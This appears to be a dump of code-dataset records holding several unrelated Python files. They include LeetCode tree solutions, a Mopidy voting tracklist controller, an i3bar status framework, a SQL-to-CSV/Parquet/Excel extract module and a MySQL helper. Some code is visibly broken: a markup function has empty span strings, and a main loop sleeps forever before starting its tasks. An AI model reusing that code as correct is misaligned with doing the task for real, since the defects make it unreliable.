multiplication.py","file_name":"matrix multiplication.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"344680427","text":"# reference https://leetcode.com/problems/binary-tree-maximum-path-sum/discuss/39919/8-10-lines-two-solutions\nfrom typing import List\n\n# Definition for a binary tree node.\n# The number of nodes in the tree is in the range [1, 3 * 104].\n# So it is null empty tree\nclass TreeNode:\n \n \n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n#recursion\n#runtime O(n^2)\nclass Solution1:\n def maxPathSum(self, root: TreeNode) -> int:\n def maxPathFromRoot(root: TreeNode) ->int:\n if root.left:\n resL = maxPathFromRoot(root.left)\n if root.right:\n resR = maxPathFromRoot(root.right)\n res = max(resL*(resL>0),resR*(resR>0)) + root.val\n else:\n res = resL*(resL>0) + root.val\n elif root.right:\n resR = maxPathFromRoot(root.right)\n res = resR*(resR>0) + root.val\n else:\n res = root.val\n return res\n if root.left:\n resL = self.maxPathSum(root.left)\n resLFromRoot = maxPathFromRoot(root.left)\n if root.right:\n resR = self.maxPathSum(root.right)\n resRFromRoot = maxPathFromRoot(root.right)\n resM = resLFromRoot*(resLFromRoot>0) + resRFromRoot*(resRFromRoot>0) + root.val\n res = max(resL,resR,resM)\n else:\n resM = resLFromRoot*(resLFromRoot>0) + root.val\n res = max(resL,resM)\n elif root.right:\n resR = self.maxPathSum(root.right)\n resRFromRoot = maxPathFromRoot(root.right)\n resM = resRFromRoot*(resRFromRoot>0) + root.val\n res = max(resR,resM)\n else:\n res = root.val\n return res\n\n#recursion\n#runtime O(n^2)\n#key is maxPathToRoot Could be zero\nclass Solution2:\n def maxPathSum(self, root: TreeNode) -> int:\n if not root:\n res = float(\"-inf\")\n return res\n\n def maxPathToRoot(root: TreeNode) ->int:\n if not root:\n return 0\n LRes = maxPathToRoot(root.left)\n RRes = maxPathToRoot(root.right)\n res = max(max(LRes,RRes) + root.val,0)\n return res\n\n LRes = self.maxPathSum(root.left)\n RRes = self.maxPathSum(root.right)\n MRes = maxPathToRoot(root.left) + maxPathToRoot(root.right) + root.val #so it is O(n^2), 
because here is O(n)\n res = max(LRes,RRes,MRes)\n return res\n\n\n#recursion\n#runtime O(n)\n#key is maxPathToRoot Could be zero\nclass Solution3:\n def maxPathSum(self, root: TreeNode) -> int:\n self.maxres = float(\"-inf\")\n def maxPathToRoot(root: TreeNode) ->int:\n if not root:\n return 0\n LRes = maxPathToRoot(root.left)\n RRes = maxPathToRoot(root.right)\n res = max(max(LRes,RRes) + root.val,0)\n self.maxres = max(self.maxres, LRes + RRes + root.val)\n return res\n maxPathToRoot(root)\n return self.maxres \n\nif __name__=='__main__':\n root = TreeNode(val=-10, left=TreeNode(val=9), right=TreeNode(val=20, left=TreeNode(val=15), right=TreeNode(val=7)))\n root = TreeNode(val= 1, left= TreeNode(val= 2, left= None, right= None), right= TreeNode(val= 3, left= None, right= None))\n root = TreeNode(val=2)\n res = Solution2()\n res.maxPathSum(root)\n\n\n\n","sub_path":"00124binaryTreeMaximumPathSum/00124binaryTreeMaximumPathSum.py","file_name":"00124binaryTreeMaximumPathSum.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"486161325","text":"from __future__ import unicode_literals\n\nimport logging\nimport random\nfrom mopidy.audio import PlaybackState\nfrom mopidy.models import TlTrack\nfrom bbmodels import bbTrack\nimport itunes\nif not itunes.is_caching_enabled():\n itunes.enable_caching()\nimport urllib\nfrom mopidy.core import listener\nimport os\nimport operator\n\nlogger = logging.getLogger('mopidy.bb')\nfrom mopidy import settings\ncover_dir=\"\"\n\nclass bbTracklistController(object):\n pykka_traversable = True\n\n def __init__(self, core,config):\n self._core = core\n self._next_tlid = 1\n self._bb_tracks = []\n self._version = 0\n self._tl_length=0\n self.playingSong=None\n if config['http']['static_dir']:\n cover_dir = config['http']['static_dir']+ \"/tmp/\"\n else:\n cover_dir = os.path.join(os.path.dirname(__file__), 'data')\n\n\n\n\n#Get the songs with their votes, comments and so on...\n def get_bb_tracks(self):\n return self._bb_tracks[:]\n\n tl_tracks = property(get_bb_tracks)\n \"\"\"\n List of :class:`mopidy.boombox.models.bbTrack`.\n\n Read-only.\n \"\"\"\n\n#get only the song\n def get_tracks(self):\n return [bb_track.track for bb_track in self._bb_tracks]\n\n tracks = property(get_tracks)\n \"\"\"\n List of :class:`mopidy.models.Track` in the tracklist.\n\n Read-only.\n \"\"\"\n\n def get_length(self):\n return len(self._bb_tracks)\n\n length = property(get_length)\n \"\"\"Length of the tracklist.\"\"\"\n\n\n def add(self, track, at_position=None, m_msg=\"\",m_name=\"anonym\"):\n \"\"\"\n Add the track or list of tracks to the tracklist.\n\n If ``at_position`` is given, the tracks placed at the given position in\n the tracklist. 
If ``at_position`` is not given, the tracks are appended\n        to the end of the tracklist.\n\n        Triggers the :meth:`mopidy.core.CoreListener.tracklist_changed` event.\n\n        :param tracks: tracks to add\n        :type tracks: list of :class:`mopidy.models.Track`\n        :param at_position: position in tracklist to add track\n        :type at_position: int or :class:`None`\n        :rtype: list of :class:`mopidy.models.TlTrack`\n        \"\"\"\n\n        iter_track = bbTrack(track, self._next_tlid, m_msg, m_name) #bbTrack(self, mtrack , mid, mmsg=\"\", mname=\"\" ):\n\n        if at_position is not None:\n            self._bb_tracks.insert(at_position, iter_track)\n            at_position += 1\n        else:\n            self._bb_tracks.append(iter_track)\n            #self._core.tracklist.add(track)\n\n        if iter_track:\n            #self._increase_version()\n            pass\n        self._next_tlid += 1\n\n        self.updateOrder()\n\n        #logger.info(iter_track.track[0].artists)\n        for art in iter_track.track[0].artists:\n            break\n        try:\n            if art != None:\n                iter_track.cover_url = self.getCoverUrl(iter_track.track[0].album.name +\" \" + art.name ) \n            else:\n                iter_track.cover_url=\"default.jpg\"\n        except NameError:\n            iter_track.cover_url=\"default.jpg\" \n\n        return iter_track\n\n    def vote(self,bbTrack,nvotes):\n        \"\"\"\n        Add or remove votes for the given track.\n\n        Perhaps: Triggers the :meth:`mopidy.core.CoreListener.tracklist_changed` event.\n        \"\"\"\n        bbTrack.votes+=nvotes\n        self.updateOrder()\n        return bbTrack.votes\n\n    def getTrackById(self,song_id):\n        for song in self._bb_tracks:\n            #logger.info(\" track; \"+ str(song.serialize()) )\n            if song.bbid == song_id:\n                return song\n        return None\n\n    def getTrackByMainlistId(self,song_id):\n        for song in self._bb_tracks:\n            if song.tlid==song_id:\n                return song\n        return None\n\n\n    def clear(self):\n        \"\"\"\n        Clear the tracklist.\n\n        Triggers the :meth:`mopidy.core.CoreListener.tracklist_changed` event.\n        \"\"\"\n        self._bb_tracks = []\n        #self._increase_version()\n\n    def index(self, bb_track):\n        \"\"\"\n        Get index of the given :class:`mopidy.models.TlTrack` in the tracklist.\n\n        Raises :exc:`ValueError` if not found.\n\n        :param tl_track: track to find the index of\n        :type tl_track: :class:`mopidy.models.TlTrack`\n        :rtype: int\n        \"\"\"\n        return self._bb_tracks.index(bb_track)\n\n    def move(self, start, end, to_position):\n        \"\"\"\n        Move the tracks in the slice ``[start:end]`` to ``to_position``.\n\n        Triggers the :meth:`mopidy.core.CoreListener.tracklist_changed` event.\n\n        :param start: position of first track to move\n        :type start: int\n        :param end: position after last track to move\n        :type end: int\n        :param to_position: new position for the tracks\n        :type to_position: int\n        \"\"\"\n        if start == end:\n            end += 1\n\n        tl_tracks = self._bb_tracks\n\n        assert start < end, 'start must be smaller than end'\n        assert start >= 0, 'start must be at least zero'\n        assert end <= len(tl_tracks), \\\n            'end can not be larger than tracklist length'\n        assert to_position >= 0, 'to_position must be at least zero'\n        assert to_position <= len(tl_tracks), \\\n            'to_position can not be larger than tracklist length'\n\n        new_tl_tracks = tl_tracks[:start] + tl_tracks[end:]\n        for tl_track in tl_tracks[start:end]:\n            new_tl_tracks.insert(to_position, tl_track)\n            to_position += 1\n        self._bb_tracks = new_tl_tracks\n        #self._increase_version()\n\n    def remove(self, m_bbid):\n        tl_tracks = self.filter( { 'bbid':m_bbid } )\n        for tl_track in tl_tracks:\n            position = self._bb_tracks.index(tl_track)\n            del self._bb_tracks[position]\n        #self._increase_version()\n        return tl_tracks\n\n    
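# usage sketch (hypothetical id): self.remove(m_bbid=7) drops the matching entries from the\n    # queue and returns them, so callers can confirm which track was voted off\n    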
def filter(self, criteria=None, **kwargs):\n        \"\"\"\n        Filter the tracklist by the given criteria.\n\n        Examples::\n\n            # Returns track with TLID 7 (tracklist ID)\n            filter({'tlid': 7})\n            filter(tlid=7)\n\n            # Returns track with ID 1\n            filter({'id': 1})\n            filter(id=1)\n\n            # Returns track with URI 'xyz'\n            filter({'uri': 'xyz'})\n            filter(uri='xyz')\n\n            # Returns track with ID 1 and URI 'xyz'\n            filter({'id': 1, 'uri': 'xyz'})\n            filter(id=1, uri='xyz')\n\n        :param criteria: one or more criteria to match by\n        :type criteria: dict\n        :rtype: list of :class:`mopidy.models.TlTrack`\n        \"\"\"\n        criteria = criteria or kwargs\n        matches = self._bb_tracks\n        for (key, value) in criteria.iteritems():\n            if key == 'tlid':\n                matches = filter(lambda ct: ct.tlid == value, matches)\n            elif key == 'bbid':\n                matches = filter(lambda ct: ct.bbid == value, matches)\n            else:\n                matches = filter(\n                    lambda ct: getattr(ct.track, key) == value, matches)\n        return matches\n\n\n    def getCoverUrl(self, album_title):\n        try:\n            album = itunes.search_album(album_title)[0]\n            aa=album.get_artwork()\n            bb=aa['100'].replace('100x100','225x225')\n            fname=bb[bb.rfind(\"/\")+1:len(bb)]\n        except Exception:\n            #logger.info(\"NO COVER AVAILABLE\")\n            return \"default.jpg\" \n        if ( os.path.isfile(cover_dir+fname) ==False) :\n            urllib.urlretrieve (bb, cover_dir+fname)\n        return fname\n\n\n    def getNextOne(self):\n        if(self.get_length>0) :\n            return self._bb_tracks[0]\n        else:\n            return None\n\n    def updateOrder(self):\n\n        #essential\n        #oldList=self._bb_tracks;\n        #self.sortedlist = sorted(self.songDict, key=lambda x: self.songDict[x].votes , reverse=True)\n        #first order by time\n        #sortedlist_tmp = sorted(self.songDict.values(), key=attrgetter('timeStamp'), reverse=False);\n        # and then by votes\n        self._bb_tracks.sort( key=operator.attrgetter(\"votes\"), reverse=True);\n\n    def playNext(self):\n        #logger.info(\"playback ended ----\")\n        if( self._core.tracklist.get_length().get() == 0 ): #if the \"official\" TL holds no song at all; by design this is always the case\n            nextbbSong=self.getNextOne()\n\n            if(nextbbSong!=None):\n\n\n                tl_tracks=self._core.tracklist.add(nextbbSong.track).get() #add one track\n                nextbbSong.tlid=tl_tracks[0].tlid #and copy over its tracklist ID\n                self.playingSong=nextbbSong\n                self.remove(nextbbSong.bbid)\n                if(self._core.playback.get_state().get()!=PlaybackState.PLAYING):\n                    self._core.playback.play().get()\n                ctrac = self._core.playback.get_current_track().get().length\n                #self._core.playback.seek(ctrac-15000).get()\n\n    def isSongInTracklist(self, song_uri):\n        for song in self._bb_tracks:\n            if song.track[0].uri == song_uri:\n                return song\n        return None\n\n    def getTrackListLength(self):\n        tl_length=0;\n        for song in self._bb_tracks:\n            try:\n                tl_length += song.track[0].length\n            except TypeError:\n                tl_length += 120000\n\n        if tl_length==0:\n            tl_length=90000\n\n        self._tl_length=tl_length\n        return self._tl_length\n\n    def getFastTlLength(self):\n        return self._tl_length\n\n","sub_path":"mopidy/frontends/http/boombox/bbtracklist.py","file_name":"bbtracklist.py","file_ext":"py","file_size_in_byte":9700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"424628718","text":"#! 
/usr/bin/python\n\nimport asyncio as aio\nimport bisect\nimport json\nimport time\nimport traceback as trc\nfrom abc import abstractmethod\nfrom collections import Counter\nfrom datetime import timedelta\nfrom math import floor, log10\nfrom shutil import which\nfrom statistics import median\nfrom sys import stderr, stdin, stdout\nfrom typing import Any\nfrom typing import Counter as Ctr_t\nfrom typing import Dict, Set, Tuple, Union\n\n# base 16 tomorrow colors\n# https://chriskempson.github.io/base16/#tomorrow\n\nNEAR_BLACK = \"#1D1F21\"\nDARKER_GREY = \"#282A2E\"\nDARK_GREY = \"#373B41\"\nGREY = \"#969896\"\nLIGHT_GREY = \"#B4B7B4\"\nLIGHTER_GREY = \"#C5C8C6\"\nNEAR_WHITE = \"#E0E0E0\"\nWHITE = \"#FFFFFF\"\nRED = \"#CC6666\"\nORANGE = \"#DE935F\"\nYELLOW = \"#F0C674\"\nGREEN = \"#B5BD68\"\nCYAN = \"#8ABEB7\"\nBLUE = \"#81A2BE\"\nVIOLET = \"#B294BB\"\nBROWN = \"#A3685A\"\n\nCHUNK_DEFAULTS = {\n \"markup\": \"pango\",\n \"border\": DARK_GREY,\n \"separator\": \"false\",\n \"separator_block_width\": 0,\n}\n\nLOOP = aio.get_event_loop()\n\n\ndef process_chunk(unit: \"PY9Unit\", chunk, padding, **kwargs):\n # TODO: short_text support\n \"\"\"\n Generates a JSON string snippet corresponding to the output one i3bar\n unit.\n\n Args:\n chunk:\n A string, the `full_text` of the unit's output, or `None`.\n padding:\n number of spaces to add at the beginning and end of each unit's\n text\n kwargs:\n any valid i3bar input API keyword. Takes precedence over\n default values.\n\n Returns:\n a string containing JSON output expected by the i3bar API for a single\n bar element.\n\n Will override defaults with, in decreasing order of precedence,\n `unit.transient_overrides` (which will be cleared after)\n `unit.permanent_overrides` (which, naturally, will not)\n kwargs (\"global\" overrides set in the control loop)\n \"\"\"\n\n # chunks can return None to signify no output\n if chunk is None:\n return \"\"\n\n chunk = {\"full_text\": chunk}\n\n # change some defaults:\n chunk.update(CHUNK_DEFAULTS)\n\n # set the name\n chunk.update({\"name\": unit.name})\n\n # apply any global (kwarg) overrides\n chunk.update(kwargs)\n # apply any unit-set overrides\n chunk.update(unit.permanent_overrides)\n # transient overrides take precedence\n chunk.update(unit.transient_overrides)\n unit.transient_overrides.clear()\n\n chunk[\"full_text\"] = \" \" * padding + chunk[\"full_text\"] + \" \" * padding\n\n return json.dumps(chunk)\n\n\nclass PY9Status:\n \"\"\"\n Class managing the control loop.\n\n contains distinct units which each generate one or more output chunks,\n and are polled for output independently according to their `unit.ival`\n value\n \"\"\"\n\n def __init__(self, units, min_sleep=0.1, padding=1, chunk_kwargs=None):\n \"\"\"\n units:\n list of PY9Unit units to poll. their ordering in the list will\n order their output.\n padding:\n number of spaces to add at the beginning and end of each unit's\n output text\n min_sleep:\n minimum number of seconds to sleep between unit poll sweeps.\n format_kwargs:\n kwargs to pass to `process_chunk`, which formats unit output\n into the format expected by i3. Globally verride `process_chunk`\n defaults with this. Units also have means of doing this on an\n individual basis. 
see PY9Unit.\n \"\"\"\n\n self.fail = \"\"\n names: Set[str] = set()\n\n for u in units:\n if u.name not in names:\n names.add(u.name)\n continue\n self.fail = json.dumps(\n {\n \"full_text\": colorify(\n \"GLOBAL FAILURE: duplicate unit name %s\" % u.name, \"#FF0000\"\n ),\n \"markup\": \"pango\",\n }\n )\n break\n\n self.units = units\n self.units_by_name = {u.name: u for u in units}\n\n if chunk_kwargs is None:\n self.chunk_kwargs: Dict[str, Any] = {}\n else:\n assert isinstance(chunk_kwargs, dict)\n self.chunk_kwargs = chunk_kwargs\n self.padding = padding\n\n self.min_sleep = min_sleep\n\n self.unit_outputs = {\n u.name: process_chunk(\n u,\n colorify('unit \"%s\" loading' % u.name, VIOLET),\n self.padding,\n **self.chunk_kwargs,\n )\n for u in self.units\n }\n\n def write_status_line(self):\n \"\"\"\n Aggregates all units' output into a single string status line and\n writes it.\n \"\"\"\n o = []\n for u in self.units:\n chunk_json = self.unit_outputs[u.name]\n if chunk_json:\n o.append(chunk_json)\n\n stdout.write(\"[\" + \",\".join(o) + \"],\\n\")\n stdout.flush()\n\n async def read_clicks(self):\n rt = aio.StreamReader()\n rp = aio.StreamReaderProtocol(rt)\n\n await LOOP.connect_read_pipe(lambda: rp, stdin)\n\n # we can get by without a json parser for this stream, carefully...\n # \"burn\" the opening [\\n or ,\\n\n await rt.read(2)\n\n while True:\n try:\n raw = await rt.readuntil(b\"}\")\n click = json.loads(raw)\n self.units_by_name[click.pop(\"name\")].handle_click(click)\n # burn the comma\n await rt.readuntil(b\",\")\n except Exception:\n continue\n\n async def line_writer(self):\n while True:\n self.write_status_line()\n await aio.sleep(self.min_sleep)\n\n def run(self) -> None:\n \"\"\"\n The main control loop.\n \"\"\"\n\n # header\n stdout.write('{\"version\":1,\"click_events\":true}\\n[\\n')\n stdout.flush()\n\n if self.fail:\n stdout.write(\"[\" + self.fail + \"],\\n\")\n stdout.flush()\n\n while True:\n time.sleep(1e9)\n\n aio.ensure_future(self.read_clicks(), loop=LOOP)\n for unit in self.units:\n aio.ensure_future(\n unit.main_loop(self.unit_outputs, self.padding, self.chunk_kwargs),\n loop=LOOP,\n )\n aio.ensure_future(self.line_writer())\n\n LOOP.run_forever()\n\n\nclass PY9Unit:\n \"\"\"\n Class producing a single chunk of the status line. Individual units\n should inherit directly from this class.\n\n Each subclass is documented with an Output API, specifying the\n set of output names of the unit.\n\n The existence of a `unit.api` @property is enforced, and should yield\n a dictionary of `key: (type, description)` elements. Each key should\n correspond to a key in the dictionary output by `read`. This api should\n be seen as an extended-form docstring for those wishing to override\n `format` without knowing the details of `read`.\n\n By convention, `read` should indicate failure states through keys\n named `err_*`. `format` should check for these first, as their presence\n might indicate the absence or invalidity of data keys. These errors\n should be documented in the `api`.\n \"\"\"\n\n name_resolver: Ctr_t[str] = Counter()\n\n def __init__(self, name=None, poll_interval=0.33, requires=None, **kwargs) -> None:\n \"\"\"\n Args:\n name:\n name of the unit as seen by i3. if None, will be set to\n the class name. Multiple unnamed instances of the same class\n lead to problems !!!\n poll_interval:\n frequency with which the control loop will try to poll this\n unit. 
True frequency will be somewhat less\n (see `PY9Status.run`)\n requires:\n list of binaries which are required for this unit to function.\n If any of these is absent, the unit's `_get_chunk`\n method will be replaced with a graceful failure message.\n\n Attributes:\n self.transient_overrides:\n `process_chunk` will, after each invocation of _get_chunk,\n augment the returned json with these parameters, and clear this\n dict.\n self.permanent_overrides:\n same as above, but `process_chunk` will not clear these.\n subordinate to transient_overrides.\n \"\"\"\n\n name = name or self.__class__.__name__\n\n name_ix = self.name_resolver[name]\n self.name_resolver[name] += 1\n name += \"\" if name_ix == 0 else f\"_{name_ix}\"\n self.name = name\n\n self.poll_interval = poll_interval\n # backwards compatibility\n if \"ival\" in kwargs:\n self.poll_interval = kwargs.pop(\"ival\")\n if kwargs:\n raise ValueError(f\"Got unknown arguments {kwargs.keys()}!\")\n\n self.transient_overrides: Dict[str, str] = {}\n self.permanent_overrides: Dict[str, str] = {}\n\n if requires is not None:\n for req in requires:\n if which(req) is None:\n self._get_chunk = lambda: (\n self.name + \" [\" + colorify(req + \" not found\", RED) + \"]\"\n )\n break\n\n self._fail = False\n\n async def main_loop(self, d_out, padding, chunk_kwargs):\n while True:\n try:\n if self._fail:\n raise ValueError\n d_out[self.name] = process_chunk(\n self, self.format(self.read()), padding, **chunk_kwargs\n )\n except Exception:\n if self._fail:\n fail_str = colorify(self._fail, BROWN)\n else:\n fail_str = colorify(f'unit \"{self.name}\" failed', BROWN)\n trc.print_exc(file=stderr)\n d_out[self.name] = process_chunk(\n self, fail_str, padding, **chunk_kwargs\n )\n\n await aio.sleep(self.poll_interval)\n\n @property\n @abstractmethod\n def api(self) -> Dict[str, Tuple[type, str]]:\n \"\"\"\n Get a dictionary mapping read output keys to their types and\n descriptions.\n \"\"\"\n\n @abstractmethod\n def read(self) -> Dict[str, Any]:\n \"\"\"\n Get the unit's output as a dictionary, in line with its API.\n \"\"\"\n\n @abstractmethod\n def format(self, read_output: Dict[str, Any]) -> str:\n \"\"\"\n Format the unit's `read` output, returning a string.\n\n The string will be placed in the \"full_text\" key of the json sent to\n i3.\n\n The string may optionally use pango formatting.\n \"\"\"\n\n def handle_click(self, click: Dict[str, Any]) -> None:\n \"\"\"\n Handle the i3-generated `click`, passed as a dictionary.\n\n See i3 documentation and example code for click's members\n \"\"\"\n self.transient_overrides.update({\"border\": RED})\n\n\ndef mk_tcolor_str(temp):\n if temp < 100:\n tcolor_str = colorify(\n \"{:3.0f}\".format(temp), get_color(temp, breakpoints=[30, 50, 70, 90])\n )\n else: # we're on fire\n tcolor_str = pangofy(\n \"{:3.0f}\".format(temp), color=\"#FFFFFF\", background=\"#FF0000\"\n )\n\n return tcolor_str\n\n\ndef get_color(\n v, breakpoints=None, colors=(BLUE, GREEN, YELLOW, ORANGE, RED), rev=False\n):\n \"\"\"\n Chooses appropriate conditional-color for colorify function.\n\n Maps an integer and an increasing list of midpoints to a colour in the\n `colors` array based on the integer's index in the list of midpoints.\n \"\"\"\n if breakpoints is None:\n breakpoints = [20, 40, 60, 80]\n if rev:\n colors = list(reversed(colors))\n return colors[bisect.bisect(breakpoints, v)]\n\n\ndef pangofy(s, **kwargs):\n \"\"\"\n applies kwargs to s, pango style, returning a span string\n \"\"\"\n a = (\n \"\"\n )\n b = \"\"\n return a + s 
+ b\n\n\ndef colorify(s, color):\n return pangofy(s, color=color)\n\n\ndef colorize_float(val, length, prec, breakpoints):\n return colorify(f\"{val:{length}.{prec}f}\", get_color(val, breakpoints=breakpoints))\n\n\ndef format_duration(val: Union[timedelta, float]) -> str:\n \"\"\"\n Formats a duration in seconds in a human-readable way.\n\n Has a fixed width of 9.\n \"\"\"\n\n if isinstance(val, timedelta):\n val = val.seconds + 1e-6 * val.microseconds\n\n if val < 60:\n if val < 1e-9:\n unit = \"ps\"\n disp_val = val * 1e12\n elif val < 1e-6:\n unit = \"ns\"\n disp_val = val * 1e9\n elif val < 1e-3:\n unit = \"us\"\n disp_val = val * 1e6\n elif val < 1.0:\n unit = \"ms\"\n disp_val = val * 1e3\n else:\n unit = \"s \"\n disp_val = val\n\n prec = max(0, 2 - floor(log10(disp_val)))\n\n return f\" {disp_val: >4.{prec}f} {unit} \"\n\n # val (- [minute, four weeks)\n elif 60 <= val < 3155760000:\n if val < 3600:\n fst, snd_s = divmod(val, 60)\n snd = int(snd_s)\n ufst, usnd = \"m\", \"s\"\n elif val < 86400:\n fst, snd_s = divmod(val, 3600)\n snd = int(snd_s / 60)\n ufst, usnd = \"h\", \"m\"\n elif val < 604800:\n fst, snd_s = divmod(val, 86400)\n snd = int(snd_s / 3600)\n ufst, usnd = \"d\", \"h\"\n elif val < 31557600:\n fst, snd_s = divmod(val, 604800)\n snd = int(snd_s / 86400)\n ufst, usnd = \"w\", \"d\"\n else:\n fst, snd_s = divmod(val, 31557600)\n snd = int(snd_s / 604800)\n ufst, usnd = \"y\", \"w\"\n\n return f\"{int(fst): >2d} {ufst} {snd: >2d} {usnd}\"\n\n # XXX expand unto aeons\n else:\n return \" > 10 y \"\n\n\ndef maybe_int(x):\n try:\n return int(x)\n except ValueError:\n return x\n\n\ndef med_mad(xs):\n \"\"\"\n Returns the median and median absolute deviation of the passed iterable.\n \"\"\"\n\n med = median(xs)\n mad = median(abs(x - med) for x in xs)\n\n return med, mad\n","sub_path":"py9status/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":14227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"138001924","text":"import csv\nimport pandas as pd\nimport openpyxl\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.pool import NullPool\nfrom .sqldb import SQLDB\nimport logging\nfrom os.path import basename\n\n# Rename to Extract and remove existing Extract class\nclass Extract:\n def __init__(self):\n self.df = None\n self.path = None\n self.logger = logging.getLogger(__name__)\n\n def to_csv(self, csv_path, sep=\"\\t\", chunksize=None, debug=False, cursor=None):\n self.logger.info(f\"Downloading data into '{basename(csv_path)}'...\")\n\n if self.tool_name == \"QFrame\":\n self.sql = self.get_sql()\n if \"denodo\" in self.engine.lower():\n self.sql += \" CONTEXT('swap' = 'ON', 'swapsize' = '400', 'i18n' = 'us_est', 'queryTimeout' = '9000000000', 'simplify' = 'off')\"\n row_count = to_csv(\n columns=self.get_fields(aliased=True),\n csv_path=csv_path,\n sql=self.sql,\n engine=self.engine,\n sep=sep,\n chunksize=chunksize,\n cursor=cursor,\n interface=self.interface,\n )\n self.logger.info(f\"Successfully wrote to '{basename(csv_path)}'\")\n if debug:\n return row_count\n return self\n elif self.tool_name == \"GitHub\":\n self.df.to_csv(csv_path)\n\n def to_parquet(self, parquet_path, chunksize=None, debug=False, cursor=None):\n \"\"\"Saves data to Parquet file.\n TO CHECK: I don't think we need chunksize anymore since we do chunks with\n sql\n\n Note: You need to use BIGINT and not INTEGER as custom_type in QFrame. 
The\n problem is that parquet files use int64 and INTEGER is only int4\n\n Parameters\n ----------\n parquet_path : str\n Path to template Parquet file\n chunksize : str\n Not implemented\n debug : str, optional\n Whether to display the number of rows returned by the query\n Returns\n -------\n Class\n \"\"\"\n if self.tool_name == \"QFrame\":\n self.df = self.to_df()\n self.df.astype(dtype=self.dtypes).to_parquet(parquet_path)\n elif self.tool_name == \"GitHub\":\n self.df.astype(dtype=self.df.dtypes).to_parquet(parquet_path)\n if debug:\n return self.df.shape[0] or 0\n\n def to_excel(\n self, input_excel_path, output_excel_path, sheet_name=\"\", startrow=0, startcol=0, index=False, header=False,\n ):\n \"\"\"Saves data to Excel file.\n\n Parameters\n ----------\n input_excel_path : str\n Path to template Excel file\n output_excel_path : str\n Path to Excel file in which we want to save data\n sheet_name : str, optional\n Sheet name, by default ''\n startrow : int, optional\n Upper left cell row to dump data, by default 0\n startcol : int, optional\n Upper left cell column to dump data, by default 0\n index : bool, optional\n Write row index, by default False\n header : bool, optional\n Write header, by default False\n\n Returns\n -------\n Class\n \"\"\"\n copy_df_to_excel(\n df=self.df,\n input_excel_path=input_excel_path,\n output_excel_path=output_excel_path,\n sheet_name=sheet_name,\n startrow=startrow,\n startcol=startcol,\n index=index,\n header=header,\n )\n\n\ndef copy_df_to_excel(\n df, input_excel_path, output_excel_path, sheet_name=\"\", startrow=0, startcol=0, index=False, header=False,\n):\n writer = pd.ExcelWriter(input_excel_path, engine=\"openpyxl\")\n book = openpyxl.load_workbook(input_excel_path)\n writer.book = book\n\n writer.sheets = dict((ws.title, ws) for ws in book.worksheets)\n\n df.to_excel(\n writer, sheet_name=sheet_name, startrow=startrow, startcol=startcol, index=index, header=header,\n )\n\n writer.path = output_excel_path\n writer.save()\n writer.close()\n\n\ndef to_csv(columns, csv_path, sql, engine=None, sep=\"\\t\", chunksize=None, debug=False, cursor=None, interface=None):\n \"\"\"\n Writes table to csv file.\n Parameters\n ----------\n csv_path : string\n Path to csv file.\n sql : string\n SQL query.\n engine : str, optional\n Engine string. 
Required if cursor is not provided.\n    sep : string, default '\\t'\n        Separator/delimiter in csv file.\n    chunksize : int, default None\n        If specified, return an iterator where chunksize is the number of rows to include in each chunk.\n    cursor : Cursor, optional\n        The cursor to be used to execute the SQL, by default None\n    \"\"\"\n    interface = interface or \"sqlalchemy\"\n    if cursor:\n        cursor.execute(sql)\n        close_cursor = False\n\n    else:\n        db = \"denodo\" if \"denodo\" in engine else \"redshift\"\n\n        if interface == \"sqlalchemy\":\n            engine = create_engine(engine)\n            try:\n                con = engine.connect().connection\n                cursor = con.cursor()\n                cursor.execute(sql)\n            except:\n                try:\n                    con = engine.connect().connection\n                    cursor = con.cursor()\n                    cursor.execute(sql)\n                except:\n                    raise\n        else:\n            con = SQLDB(db=db, engine_str=engine, interface=interface).get_connection()\n            cursor = con.cursor()\n            cursor.execute(sql)\n\n        close_cursor = True\n\n    with open(csv_path, \"w\", newline=\"\", encoding=\"utf-8\") as csvfile:\n        writer = csv.writer(csvfile, delimiter=sep)\n        writer.writerow(columns)\n        cursor_row_count = 0\n        if isinstance(chunksize, int):\n            if chunksize == 1:\n                while True:\n                    row = cursor.fetchone()\n                    if not row:\n                        break\n                    cursor_row_count += 1\n                    writer.writerow(row)\n            else:\n                while True:\n                    rows = cursor.fetchmany(chunksize)\n                    cursor_row_count += len(rows)\n                    if not rows:\n                        break\n                    writer.writerows(rows)\n        else:\n            writer.writerows(cursor.fetchall())\n\n    if close_cursor:\n        cursor.close()\n        con.close()\n\n    return cursor_row_count\n","sub_path":"grizly/tools/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"581922546","text":"import mysql.connector\nimport connection_info\n\n\ndef get_list_has():\n    cnx = mysql.connector.connect(user=connection_info.MyUser, password=connection_info.MyPassword,\n                                  host=connection_info.MyHost,\n                                  database=connection_info.MyDatabase)\n\n    cursor = cnx.cursor()\n    query = \"SELECT * FROM Has;\"\n    hases = []\n    try:\n        cursor.execute(query)\n        for (locID, prodID, price, stock) in cursor:\n            hases.append({\n                \"Location ID\": locID,\n                \"Product ID\": prodID,\n                \"Price\": price,\n                \"Number in Stock\": stock,\n            })\n\n    except Exception as e:\n        print(\"Got an error:\")\n        print(e)\n        cursor.close()\n        cnx.close()\n        return []\n\n    cursor.close()\n    cnx.close()\n    return hases\n","sub_path":"api/db_actions/has.py","file_name":"has.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"314820399","text":"import os.path\nimport re\nimport _thread\nimport threading\nimport logging\n\n\n\n# Traverse the specified directory and count files whose contents match the pattern\ndef eachFile(line,filepath):\n    count = 0\n    pathDir = os.listdir(filepath)\n    for allDir in pathDir:\n        child = os.path.join('%s/%s' % (filepath, allDir))\n        if os.path.isfile(child):\n            if count > 0:\n                print(\"before:\")\n                print(count)\n            count += readFile(child,line)\n            if count > 0:\n                print(count)\n            # print 